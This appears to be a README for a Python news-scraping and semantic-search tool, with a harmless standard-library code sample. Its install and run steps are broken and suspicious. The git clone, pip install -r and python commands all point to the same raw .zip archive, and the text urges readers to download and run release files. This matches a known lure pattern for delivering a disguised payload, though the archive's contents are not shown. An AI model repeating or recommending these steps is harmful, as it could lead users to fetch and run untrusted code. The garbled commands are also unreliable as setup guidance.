Welcome to the AI News Scraper repository! This project is a powerful Python application designed to scrape news articles, generate summaries using Generative AI, identify topics, and provide semantic search capabilities through vector embeddings.
- Web Scraping: Efficiently scrape news articles from various sources.
- Generative AI Summaries: Automatically generate concise summaries of the scraped articles.
- Topic Identification: Use AI to identify and categorize topics within the news articles.
- Semantic Search: Perform searches using vector embeddings for relevant results.
- User-Friendly Interface: Simple commands to execute various functions.
This project employs several technologies to achieve its goals:
- Python 3.8+: The core programming language.
- Beautiful Soup: For web scraping.
- Requests: To handle HTTP requests.
- LangChain: For managing language models and embeddings.
- FAISS: For efficient similarity search and clustering of dense vectors.
- OpenAI API: To utilize generative AI capabilities.
- Vector Databases: To store and retrieve vector embeddings.
To get started with the AI News Scraper, follow these steps:
- Clone the repository:
    git clone https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip
    cd ai-news-scraper
- Create a virtual environment (optional but recommended):
    python -m venv venv
    source venv/bin/activate  # On Windows use `venv\Scripts\activate`
- Install required packages:
    pip install -r https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip
Once you have installed the necessary packages, you can start using the AI News Scraper.
- Run the application:
    python https://raw.githubusercontent.com/techdomegh/ai-news-scraper/dev/src/ai-scraper-news-v2.1.zip
- Scrape news articles: Use the provided commands to specify the news source and the number of articles to scrape.
- Generate summaries: After scraping, you can generate summaries for each article.
- Search for topics: Use the semantic search feature to find articles based on specific topics.
The AI News Scraper follows a systematic approach:
- Scraping: The application uses Beautiful Soup and Requests to fetch news articles from the web. It extracts the title, content, and publication date of each article.
- Summarization: After scraping, the application utilizes the OpenAI API to generate summaries. The summaries condense the main points of each article into a few sentences.
- Topic Identification: The application analyzes the content to identify key topics using vector embeddings. This helps categorize articles for easier navigation.
- Semantic Search: The FAISS library enables efficient searching through the vector embeddings. Users can input queries, and the application retrieves relevant articles based on similarity.
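The scraping and semantic search steps above can be sketched roughly as follows. This is an illustration under stated assumptions, not the project's actual code: it uses only the Python standard library so that it runs without dependencies, with `html.parser` standing in for Beautiful Soup, word counts standing in for model-generated embeddings, and a linear cosine-similarity scan standing in for a FAISS index. The names `ArticleParser`, `extract_article`, `embed`, `cosine`, and `search` are hypothetical, and the assumption that the date lives in a `<time datetime="...">` tag will not hold for every news site.

```python
import math
import re
from collections import Counter
from html.parser import HTMLParser


class ArticleParser(HTMLParser):
    """Collects <title> text, the first <time datetime=...> value, and <p> text."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.published = None
        self.paragraphs = []
        self._tag = None  # tag whose text is currently being captured

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._tag = tag
        elif tag == "p":
            self._tag = tag
            self.paragraphs.append("")
        elif tag == "time" and self.published is None:
            self.published = dict(attrs).get("datetime")

    def handle_endtag(self, tag):
        if tag == self._tag:
            self._tag = None

    def handle_data(self, data):
        if self._tag == "title":
            self.title += data
        elif self._tag == "p":
            self.paragraphs[-1] += data


def extract_article(html):
    """Return the title, publication date, and body text of one HTML page."""
    parser = ArticleParser()
    parser.feed(html)
    return {
        "title": parser.title.strip(),
        "published": parser.published,
        "content": " ".join(p.strip() for p in parser.paragraphs if p.strip()),
    }


def embed(text):
    """Toy embedding (assumption): lowercase word counts instead of dense vectors."""
    return Counter(re.findall(r"[a-z0-9]+", text.lower()))


def cosine(a, b):
    """Cosine similarity between two sparse word-count vectors."""
    dot = sum(count * b[word] for word, count in a.items())
    norm_a = math.sqrt(sum(v * v for v in a.values()))
    norm_b = math.sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def search(query, articles, top_k=3):
    """Rank articles by similarity between the query and each article's content."""
    q = embed(query)
    scored = [(cosine(q, embed(a["content"])), a["title"]) for a in articles]
    return sorted(scored, reverse=True)[:top_k]
```

In a real pipeline the HTML string would come from an HTTP response rather than a literal, and the linear scan in `search` would be replaced by a vector index. An inner-product index over L2-normalized vectors produces the same ranking as the cosine score used here.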
We welcome contributions to improve the AI News Scraper. To contribute:
- Fork the repository.
- Create a new branch (`git checkout -b feature/YourFeature`).
- Make your changes.
- Commit your changes (`git commit -m 'Add some feature'`).
- Push to the branch (`git push origin feature/YourFeature`).
- Open a Pull Request.
Please ensure your code follows the style guidelines and includes tests where applicable.
This project is licensed under the MIT License. See the LICENSE file for details.
The latest releases of the AI News Scraper are published in the repository's Releases section. Download the necessary files and run them to get started, and check that section regularly for updates.
The AI News Scraper is a robust tool for anyone interested in staying updated with the latest news. By leveraging AI technologies, it not only gathers information but also makes it easier to digest and search through. We hope you find this tool useful and encourage you to contribute to its development.
